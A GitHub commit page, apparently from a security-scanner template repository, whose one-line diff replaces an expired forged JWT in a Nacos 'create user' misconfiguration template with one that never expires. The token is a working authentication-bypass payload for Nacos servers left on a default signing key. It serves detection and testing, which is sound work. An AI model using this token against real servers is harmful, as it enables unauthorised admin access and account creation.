Skip to content

Commit ea4a48d

Browse files
authored
Merge pull request #10402 from lanyi1998/main
Fix: nacos-create-user.yaml jwt exp time expired
2 parents 51b72d0 + 92f2c80 commit ea4a48d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

http/misconfiguration/nacos/nacos-create-user.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@ http:
2828
2929
payloads:
3030
token:
31-
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
31+
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
3232
attack: pitchfork
3333

3434
matchers-condition: and

0 commit comments

Comments
 (0)